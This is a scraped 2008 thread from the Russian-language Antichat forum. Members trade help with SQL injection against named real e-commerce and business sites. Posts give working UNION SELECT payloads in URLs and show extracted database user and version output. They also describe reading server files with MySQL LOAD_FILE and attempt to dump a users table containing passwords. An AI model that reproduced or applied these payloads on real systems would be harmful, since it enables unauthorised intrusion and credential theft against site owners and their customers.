ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.08.2008, 12:01
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Сообщение от sharoff
попробуй -42222 поставить, или убрать кавычку..
вполне есть вариант что у твоего юзера mysql нету доступа к базе information_schema
к информейшн.схема доступ есть. ковычку убирать и ставить "-" пробовал. =(
|
|
|
25.08.2008, 12:09
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Сообщение от ThreeD
AFoST
Ты уверен, что там именно 3 поля? Скинул бы ссылку, было б легче разобраться.Или хотя б ошибку опиши.
Мне кажется, что для посимвольного перебора ещё слишком рано, но тем не менее, ответ на твой вопрос
http://www.securitylab.ru/contest/212099.php
И в information_schema ты рано полез ))
там на самом деле 32 поля. но писать их тут долго) а вот с ошибкой там хз че. короче 2 варианта. либо белый экран, либо пишет что страница не найдена и выдает несколько символов из какого-то хеша в левой части экрана =\
ссылку пока не дам :P
|
|
|
|
25.08.2008, 12:28
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
AFoST Если скуль слепая, то либо перебор с подзапросами, либо ищи дыру в других параметрах. А вообще , если хочешь , кинь линк в ПМ , посмотрю
|
|
|
|
25.08.2008, 19:31
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
такс) прошлую проблему решил. теперь столкнулся с другой. вывожу на экран через мускул файл LOAD_FILE('/etc/passwd/logs/access.log') всё прекрасно работает. выводятся все записи и тд. в логах нашёл раскрытие путей и вывожу файл допустим такой LOAD_FILE('/home/www/name/name.ru/bla-bla/header.php') на что мне выводится на экран лишь часть аписанного в файле, примерно следующего содержания:
кусок кода страницы без скул-запроса:
<tr><td>
<a href="index.php?page=1&n=11&1187813822"><img src="66" width="90" height="90" border="1"></a>
</td>
<td width="140" class="ch5" valign="top">
<span class="ch2"><b> SQL-inj here</b></span><br>
0<br>
<a href="index.php?page=1&n=11&1187813822" class="ch5">view here</a>
</td></tr>
</table> </center>
<br>
</body>
</html> кусок кода страницы с скул-запросом:
<tr><td>
<a href="index.php?page=1&n=11&1187813307"><img src=" ?>>
<head profile="http://123.ru/11/11">
<meta http-equiv="Content-Type" content="<?php bloginfo('htmltype')" width="90" height="90" border="1"></a>
</td>
<td width="140" class="ch5" valign="top">
<span class="ch2"><b><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php languageattributes()</b></span><br>
charset=<?php bloginfo('charset')<br>
<a href="index.php?page=1&n=11&1187813307" class="ch5">view here</a>
</td></tr>
</table> </center>
<br>
</body>
</html> Кусок файла выводится на экран и всё...я так подозреваю, что ф-ция LOAD_FILE встречает какой-то символ и начинает некорректно обрабатывать содержимое файла...
вопрос. как вывести всё содержимое файла? |
|
|
|
25.08.2008, 22:48
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
возможно в поле ограничено кол-во символов
попробуй другие поля
и вообще для чтения файлов юзай Sipt 4 имхо намного удобней
|
|
|
|
25.08.2008, 23:02
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Сообщение от S00pY
возможно в поле ограничено кол-во символов
попробуй другие поля
и вообще для чтения файлов юзай Sipt 4 имхо намного удобней
ну я ж написал)
Сообщение от AFoST
вывожу на экран через мускул файл LOAD_FILE('/etc/passwd/logs/access.log') всё прекрасно работает.
Значит не в ограниченности дело...
Sipt хм...скачаю посмотрю)
|
|
|
|
25.08.2008, 23:53
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295
Репутация:
4
|
|
народ, поможите
_http://www.nailshop.ee/emall/detail.php?prodid=-1+order+by+5,2/*
из запроса ясно, что таблиц всего 5.
Но тут вылезает проблема ни к месту
"The used SELECT statements have a different number of columns" при запросе:
_http://www.nailshop.ee/emall/detail.php?prodid=-1+union+select+concat_ws(0x3a,database(),user(),ve rsion()),2,3,4,5/**/
как такое может быть??? Вксь мозг поломал уже
|
|
|
|
26.08.2008, 00:13
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
zjuk@
http://www.nailshop.ee/emall/detail.php?prodid=1+and+1=2+union+select+1,2,3,con cat_ws(0x3a,User(),Database(),Version()),5,6,7,8,9 ,0,1,2,3,4,5,6,7/*
Вывод в коде :
nailshop@localhost:nailshop_eMall:5.0.45-log
|
|
|
|
26.08.2008, 00:53
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295
Репутация:
4
|
|
http://www.nailshop.ee/emall/detail.php?prodid=1+and+1=2+union+select+1,2,3,con cat_ws(0x3a,User(),Database(),Version()),5,6,7,8,9 ,0,1,2,3,4,5,6,7/*
Вывод в коде :
nailshop@localhost:nailshop_eMall:5.0.45-log
пасибо
|
|
|
|
27.08.2008, 03:15
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295
Репутация:
4
|
|
доброго времени суток всем, подскажите, где подвох:
_http://datagate.ee/index.php?ln=rus&mid=-1+order+by+7,2/**/
из этого ясно, что полей 7, так как значения выше семи ругаются на несоответствие числа столбцов. Однако:
_http://datagate.ee/index.php?ln=rus&mid=1+and+1=2+union+select+userid ,2,user,useremail,userpassword,username,7+from+use rs/**/
снова ругается на кол-во столбцов, в чём же дело??? объясните пожалуйста
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
